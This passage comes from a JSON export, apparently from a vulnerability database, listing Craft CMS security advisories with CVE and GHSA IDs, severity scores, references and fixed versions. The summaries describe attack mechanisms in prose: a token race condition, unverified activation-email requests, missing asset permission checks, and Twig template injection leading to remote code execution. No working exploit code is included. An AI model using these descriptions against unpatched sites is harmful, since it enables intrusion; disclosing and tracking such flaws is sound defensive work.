ements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-10T15:32:09Z/"}],"url":"https://github.com/craftcms/cms/commit/395c64f0b80b507be1c862a2ec942eaacb353748"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.16.18","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.16.18"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-10T15:32:09Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25498","reference_id":"CVE-2026-25498","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25498"},{"reference_url":"https://github.com/advisories/GHSA-7jx7-3846-m7w7","reference_id":"GHSA-7jx7-3846-m7w7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7jx7-3846-m7w7"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-7jx7-3846-m7w7","reference_id":"GHSA-7jx7-3846-m7w7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-10T15:32:09Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-7jx7-3846-m7w7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73946?format=json","purl":"pkg:composer/craftcms/cms@5.8.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.22"}],"aliases":["CVE-2026-25498","GHSA-7jx7-3846-m7w7"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9enr-b6zd-mbh8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50299?format=json","vulnerability_id":"VCID-a3b5-pwyh-yugv","summary":"Craft CMS Race condition in Token Service potentially allows for token usage greater than the token limit\nA Time-of-Check-Time-of-Use (TOCTOU) race condition exists in Craft CMS’s token validation service for tokens that explicitly set a limited usage. The `getTokenRoute()` method reads a token’s usage count, checks if it’s within limits, then updates the database in separate non-atomic operations. By sending concurrent requests, an attacker can use a single-use impersonation token multiple times before the database update completes.\n\nTo make this work, an attacker needs to obtain a valid user account impersonation URL with a non-expired token via some other means and exploit a race condition while bypassing any rate-limiting rules in place.\n\nFor this to be a privilege escalation, the impersonation URL must include a token for a user account with more permissions than the current user.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27128","reference_id":"","reference_type":"","scores":[{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00627","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27128"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/3e4afe18279951c024c64896aa2b93cda6d95fdf","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:13:24Z/"}],"url":"https://github.com/craftcms/cms/commit/3e4afe18279951c024c64896aa2b93cda6d95fdf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27128","reference_id":"CVE-2026-27128","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27128"},{"reference_url":"https://github.com/advisories/GHSA-6fx5-5cw5-4897","reference_id":"GHSA-6fx5-5cw5-4897","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6fx5-5cw5-4897"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-6fx5-5cw5-4897","reference_id":"GHSA-6fx5-5cw5-4897","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:13:24Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-6fx5-5cw5-4897"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74188?format=json","purl":"pkg:composer/craftcms/cms@5.8.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.23"}],"aliases":["CVE-2026-27128","GHSA-6fx5-5cw5-4897"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-a3b5-pwyh-yugv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50678?format=json","vulnerability_id":"VCID-akrv-yqnf-1kg8","summary":"Craft CMS has unauthenticated activation email trigger with potential user enumeration\nThe `actionSendActivationEmail()` endpoint is accessible to unauthenticated users and does not require a permission check for pending users. An attacker with no prior access can trigger activation emails for any pending user account by knowing or guessing the user ID. If the attacker controls the target user’s email address, they can activate the account and gain access to the system.\n\nThe vulnerability is not that anonymous access exists - there’s a legitimate use case for it. The vulnerability is that the endpoint accepts arbitrary `userId` parameters without verifying ownership.\n\nCraft CMS allows public user registration. When a user registers but doesn’t receive their activation email (spam filter, typo correction, etc.), they need a way to request a resend. This is why `send-activation-email` is in the `allowAnonymous` array - it’s intentional self-service functionality.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-29069","reference_id":"","reference_type":"","scores":[{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17879","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-29069"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/c3d02d4a7246f516933f42106c0a67ce062f68d8","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:30:03Z/"}],"url":"https://github.com/craftcms/cms/commit/c3d02d4a7246f516933f42106c0a67ce062f68d8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29069","reference_id":"CVE-2026-29069","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29069"},{"reference_url":"https://github.com/advisories/GHSA-234q-vvw3-mrfq","reference_id":"GHSA-234q-vvw3-mrfq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-234q-vvw3-mrfq"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-234q-vvw3-mrfq","reference_id":"GHSA-234q-vvw3-mrfq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:30:03Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-234q-vvw3-mrfq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74442?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.2"}],"aliases":["CVE-2026-29069","GHSA-234q-vvw3-mrfq"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-akrv-yqnf-1kg8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95270?format=json","vulnerability_id":"VCID-asek-4gme-gug8","summary":"Craft CMS's Missing Volume Permission Check in AssetsController::actionShowInFolder Allows Information Disclosure\n## Summary\n\n`AssetsController::actionShowInFolder()` fetches an asset by ID and returns its filename and complete folder hierarchy (including volume handle, volume UID, folder names, folder UIDs, and folder URI paths) without checking whether the requesting user has `viewAssets` or `viewPeerAssets` permission on the asset’s volume. Any authenticated CP user — even one with zero volume permissions — can enumerate asset filenames and the full folder structure of any volume by supplying arbitrary asset IDs.\n\nThis follows the exact same incomplete-patch pattern as four GHSAs merged on 2026-02-25 (GHSA-x76w-8c62-48mg, GHSA-vgjg-248p-rfm2, GHSA-5pgf-h923-m958, GHSA-3pvf-vxrv-hh9c), all of which added `requireVolumePermissionByAsset()` + `requirePeerVolumePermissionByAsset()` to sibling AssetsController actions. The `actionShowInFolder` method was introduced thirteen days before the patch wave and was not included in it.\n\n## Details\n\nThe vulnerability is in `src/controllers/AssetsController.php` at line 1437. The method:\n\n1. Calls `requireCpRequest()` — verifies the request targets the CP, enforces `accessCp` permission via `Controller::_enforceAllowAnonymous()`, but does NOT enforce any volume-level permission.\n2. Fetches any asset by ID with `Asset::findOne($assetId)` — no `editable`/`savable` scope filter, so all assets across all volumes are reachable.\n3. Returns sensitive structural data via JSON.\n\n## Impact\n\n- Any authenticated control panel user with only `accessCp` permission can discover the filenames and complete folder structure (names, UIDs, handles, URIs) of assets in volumes they are not authorized to access.\n- Sensitive volume structures — private document repositories, confidential media, internal file names — are exposed to any user who can log into the control panel.\n- This enables targeted follow-up attacks: an attacker who knows a private asset’s filename and folder path may have other avenues to exfiltrate the actual file.\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/e3f3eaab3d85badd713cfc2c24e5f0792ecdb586","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44012","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01713","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44012"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/e3f3eaab3d85badd713cfc2c24e5f0792ecdb586","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-13T14:49:35Z/"}],"url":"https://github.com/craftcms/cms/commit/e3f3eaab3d85badd713cfc2c24e5f0792ecdb586"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-33m5-hqp9-97pw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-13T14:49:35Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-33m5-hqp9-97pw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44012","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44012"},{"reference_url":"https://github.com/advisories/GHSA-33m5-hqp9-97pw","reference_id":"GHSA-33m5-hqp9-97pw","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-33m5-hqp9-97pw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/118776?format=json","purl":"pkg:composer/craftcms/cms@5.9.18","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.18"}],"aliases":["CVE-2026-44012","GHSA-33m5-hqp9-97pw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-asek-4gme-gug8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50613?format=json","vulnerability_id":"VCID-azr5-12f8-hfbm","summary":"Craft CMS has potential authenticated Remote Code Execution via Twig SSTI\nFor this to work, the attacker must have administrator access to the Craft Control Panel, and [allowAdminChanges](https://craftcms.com/docs/5.x/reference/config/general.html#allowadminchanges) must be enabled, which is against Craft CMS' recommendations for any non-dev environment.\n\nhttps://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production\n\nAlternatively, they can have a non-administrator account with `allowAdminChanges` disabled, but they must have access to the System Messages utility.\n\nIt is possible to craft a malicious payload using the Twig `map` filter in text fields that accept Twig input under Settings in the Craft control panel or using the System Messages utility, which could lead to a RCE.\n\nUsers should update to the patched versions (5.8.22 and 4.16.18) to mitigate the issue.\n\nReferences:\n\nhttps://github.com/craftcms/cms/pull/18208","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28784","reference_id":"","reference_type":"","scores":[{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.0618","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28784"},{"reference_url":"https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-04T17:32:46Z/"}],"url":"https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/pull/18208","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-04T17:32:46Z/"}],"url":"https://github.com/craftcms/cms/pull/18208"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28784","reference_id":"CVE-2026-28784","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28784"},{"reference_url":"https://github.com/advisories/GHSA-qc86-q28f-ggww","reference_id":"GHSA-qc86-q28f-ggww","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qc86-q28f-ggww"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-qc86-q28f-ggww","reference_id":"GHSA-qc86-q28f-ggww","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-04T17:32:46Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-qc86-q28f-ggww"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-28784","GHSA-qc86-q28f-ggww"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-azr5-12f8-hfbm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56366?format=json","vulnerability_id":"VCID-c2nk-y4rx-1qf4","summary":"Craft CMS has potential RCE when PHP `register_argc_argv` config setting is enabled\nYou are affected if your php.ini configuration has `register_argc_argv` enabled.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56145","reference_id":"","reference_type":"","scores":[{"value":"0.93926","scoring_system":"epss","scoring_elements":"0.99888","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56145"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/82e893fb794d30563da296bca31379c0df0079b3","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"},{"value":"CRITICAL"